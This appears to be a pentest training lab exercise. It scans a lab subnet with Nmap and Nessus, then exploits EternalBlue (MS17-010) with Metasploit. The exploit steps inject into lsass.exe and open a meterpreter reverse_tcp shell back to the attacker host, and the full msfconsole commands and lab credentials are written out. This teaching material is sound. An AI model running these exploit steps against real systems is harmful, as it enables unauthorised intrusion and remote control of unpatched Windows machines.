Module 06: Network Penetration Testing Methodology-Internal 9

Exercise 9: Exploiting Windows OS Vulnerability

Scenario

Once attackers have the information related to network devices, they can use it as an entry point to a network for a comprehensive attack and perform many types of attacks ranging from DoS attacks to unauthorized administrative access.
As an expert penetration tester, you must understand how vulnerabilities, compliance specifications, and content policy violations are scanned using the Nessus tool.

Lab Duration: 30 Minutes

1. Click Kali Linux (Internal Network). If the Kali Linux lock screen appears, click on the screen and press Enter. If it does not appear, skip to the next task.
   
2. Type root in the Username field and click Next.
   
3. Type toor in the Password field and click Sign In.
   
4. In this lab, we will be scanning a subnet for live machines. Select one machine and pentest the machine to gain access to it.
   For doing a quick scan, we will do a ping sweep using Nmap. In this lab, we are choosing an internal network (Subnet D) for pentesting.
   Launch a command line terminal, type nmap -sP 172.20.20.1-255 and press Enter.
   This displays all the hosts that are up in the network within a minute. In this lab, we are choosing 172.20.20.9 (Advertisement Dept. Subnet D) as our target.
   
5. Now, we shall scan the Advertisement Dept. Subnet D machines to view the open ports, services running along with their versions, and the underlying operating system.
   Type nmap -T4 -A 172.20.20.9 and press Enter.
   Nmap takes approximately 3 minutes to complete the scan. Upon scan completion, you will observe that the port 445 is open and the underlying operating system is Windows Server 2008 R2.
   Close the terminal.
   
6. Now, we shall perform a vulnerability scan on Advertisement Dept. Subnet D using Nessus in Windows Server 2012 (Internal Network).
   

   You may additionally look for pre-existing vulnerabilities associated with the identified version of services/operating system in searchsploit/exploit-db.
7. Click Windows Server 2012 (Internal Network)and click Ctrl+Alt+Delete.
   
8. In the password field click Pa$$w0rd and press Enter.
   

   You can use the Type Password option from the Commands menu to enter the password.

   
9. To launch the Firefox browser, double-click the Firefox icon on the Desktop.
   

   You can also click the Firefox icon on the taskbar or launch it from the Start menu apps.

   
10. Firefox main window appears, now type https://localhost:8834 in the address bar of firefox and press Enter.
    
11. A webpage appears stating that your connection is not secure. Click Advanced.
    
12. Click Add Exception… button.
    
13. Add Security Exception window appears; click Confirm Security Exception.
    
14. The Nessus/Login page appears.
    Type the following credentials and click Sign In:
    Username: admin
    Password: qwerty@123
    

    If the login page does not appear, go to Control Panel --> Administrative Tools --> Services and restart Tenable Nessusservice. Once done, reload the webpage.

    
15. After successful login, go to Nessus Policieswindow and click Create a new policy link.
    

    If any notifications appear at the top right corner of the window, ignore them.

    Nessus will automatically log off if you leave the browser window idle for 5 mins.

    
16. Policy Templates window appears with Scanner Templates as shown in the screenshot below.
    
17. In the Scanner section, click Advanced Scanpolicy.
    
18. Advanced Scan policy window appears displaying the Settings tab.
    In the Basic settings under the General section, specify a policy name in the Name field (here, System_Scan) and give a description of the policy.
    Once done, leave the Permissions section with the default setting and click on Discovery in the left pane.
    In this lab, we will be scanning Advertisement Dept Subnet D machine (Windows Server 2008).
    
19. Once you click on DISCOVERY, it will drop-down a list of 3 options i.e., Host Discovery, Port Scanning, and Service Discovery. Now we are going to configure Host Discovery settings.
    In the Host Discovery settings, toggle the Ping Remote Host option to turn it off.
    

    Scroll down if you want to view the rest of the settings in Host Discovery module.

    
20. In the Port Scanning module, check the Verify open TCP ports found by local port enumerators option.
    Leaving the other settings to default, click ASSESSMENT from the left pane.
    
21. Once you click the ASSESSMENT module, it will show you the General settings where you can see the Accuracy, Antivirus definition grace period, and SMTP options. Here you can leave the settings to default, and click Brute Force from the left pane.
    
22. In the Brute Force settings, make sure that the Only use credentials provided by the useroption is checked under General Settings section, and then, click the Web Applications module in the left pane.
    
23. In the Web Application module, if you have any web applications hosted on the network, turn it ON or leave the settings to default, and then click the Windows module from the left pane. In this lab, we have left the settings to default (Turned off) as there is no web application hosted on the target machine.
    

    You can turn On the by toggling the Scan web applications switch.

    
24. In Windows module, make sure that Request Information about the SMB Domain is checked, and leave the other settings to default. Now click on the REPORT module from the left pane.
    

    You can also specify the Start UID and End UID in Enumerate Domain Users and Local Users.

    
25. In the REPORT module, leave all the settings to default and click ADVANCED from the left pane.
    
26. In the Advanced module, scroll down to Performance Options section and set the value for Max simultaneous hosts per scan as 100, Max number of concurrent TCP sessions per host as unlimited and Max number of concurrent TCP sessions per scan as unlimited. After configuring these options, scroll up the window and click on the Credentials module.
    
27. In the Credentials module, it will display the Cloud Services, Database, Host, Miscellaneous, and Plaintext Authentication options. Here you can activate these options by choosing them from the left pane.
    In this lab, we have kept the settings to default. Now, click on the Plugins module to view the available plugins.
    
28. In the Plugins module, Nessus display all the plugins and their information. Here you may choose plugins according to your target network and then, click Save button to save the new policy.
    In this lab, we are not selecting any plugins.
    
29. Now the created policy is saved in the Policiessection as shown in the screenshot below:
    
30. To begin a new scan, click My Scans in the left pane.
    
31. Click Create a New Scan link to create a new scan.
    
32. Once you click on the New Scan button, it will redirect you to Scan Templates window, where you need to select the policy you have created.
    The created policy is present in User Defined Policies section, so click on the User Definedtab.
    
33. User Defined policy section appears, click System Scan policy.
    
34. The Settings section of the Scan Templates appears.
    Set a name for the scan in the Name Text field (here, Advertisement Dept.), type a description for the scan in the Description field, leave the Folder field set to default and enter the IP address of Advertisement Dept. machine in the Targets text field (here, 172.20.20.9).
    Click on the Schedule module in the left pane.
    

    You can specify a multiple number of machines to scan using Nessus. For lab demonstration, we are using a single machine.

    
35. The Schedule section allows you to specify the frequency of the scan. In this section, you can specify how often you want Nessus to scan the target machine.
    Leave this setting to default, click on the Savedrop-down menu and click Launch. This will launch a vulnerability scan on the Advertisement Dept. Subnet D machine.
    
36. As soon as you click the Launch link, Nessus will begin the scan on the Advertisement Dept. Subnet D machine as shown in the screenshot below.
    It will take around 10 minutes to scan the machine.
    
37. Once the scan is completed, it will display a tickmark as shown in the screenshot.
    
38. Click Advertisement Dept. to view the scan result.
    
39. Click on 172.20.20.9 to view all the vulnerabilities associated with it.
    
40. A list of vulnerabilities is displayed for this host as shown in the screenshot below:
    
41. Click Export and select a format (here, HTML) in order to export the result.
    
42. The Export as HTML pop-up appears, choose Executive Summary from the drop-down list and click on the Export button.
    
43. A dialog box appears, asking you to either open or save the file. Click Save File and click OK.
    
44. Now, click on folder icon (Open Containing Folder) from notification popup that appears after completion of the download.
    

    The file will be downloaded in the default download location of browser i.e., C:\Users\Administrator\Downloads.

    
45. Double-click on the downloaded file to view the result.
    If you are asked How do you want to open this type of file (.html)?, choose a web browser to view the report. In this lab, we are using Firefox(1st icon in the list) browser.
    
46. The generated report appears as shown in the screenshot. Click Show Details to view the complete details of the vulnerabilities.
    

    Scroll down to analyze the complete report.

    
47. Now, we shall choose a vulnerability found in the target machine and attempt to exploit it using a Metasploit module. In this lab, we shall exploit a recently discovered vulnerability (Eternal Blue) associated with the MS:17-010 (CVE ID: 2017-0143). Before performing the exploitation, ensure that victim machine Advertisement Dept. Subnet D is powered On.
    Switch back to Kali Linux (Internal Network)machine.
    
48. Launch a Command Line Terminal from the taskbar.
    
49. Type msfconsole command and press Enter to launch the Metasploit framework console.
    Now, we shall check if the Advertisement Dept. Subnet D machine is vulnerable to Eternal Blue using smb_ms17_010 auxiliary scanner.
    
50. Type use auxiliary/scanner/smb/smb_ms17_010 in the msfconsole and press Enter to use the module.
    
51. Now, type set rhosts 172.20.20.9 and press Enter to set the target as Advertisement Dept. Subnet D.
    
52. Type run and press Enter to check if the machine is vulnerable.
    You will observe that Advertisement Dept. Subnet D (Windows Server 2008) is vulnerable to Eternal Blue as shown in the screenshot below:
    
53. Now, we shall search for the Eternal Blue exploit. Type search eternal blue in the msfconsole and press Enter. This displays the scanner and the exploit associated with Eternal Blue as shown in the screenshot.
    We will be using the eternalblue_doublepulsarexploit to compromise the target machine.
    
54. Type use exploit/windows/smb/eternalblue_doublepulsarin msfconsole and press Enter.
    
55. Now, type show options and press Enter to view all the options associated with the exploit.
    
56. So, we got to know from the previous step that we need to set the values of RHOST, processinject and targetarchitecture. Setting windows/x64/meterpreter/reverse_tcp payload increases the chance of gaining meterpreter session.
    Issue the following commands in the msfconsole:
    
    1. set rhost 172.20.20.9
    2. set processinject lsass.exe
    3. set targetarchitecture x64
    4. set payload windows/x64/meterpreter/reverse_tcp
    5. set lhost 172.20.20.21

    172.20.20.21 is the IP address of the Kali Linux (Internal Network) machine.

    
57. Since we have set the options required for the exploit module, we will now perform exploitation on the target machine by triggering the exploit.
    So, type exploit and press Enter.
    
58. A meterpreter session has been attained, meaning that we have successfully exploited the smb vulnerability in the target machine using the Eternal Blue exploit.
    

    Sometimes, the options you set might not fetch you the meterpreter session. In such cases, you need to change the processinject and targetarchitecturevalues and perform the exploitation again.
    If you change the targetarchitecture, you need to change the architecture of the payload as well.

    
59. We have successfully exploited the smb vulnerability found in the target machine. Take a screenshot of the boot screen which appeared in the previous step and save it to the respective pentesting directory.

You have successfully scanned a network for vulnerabilities.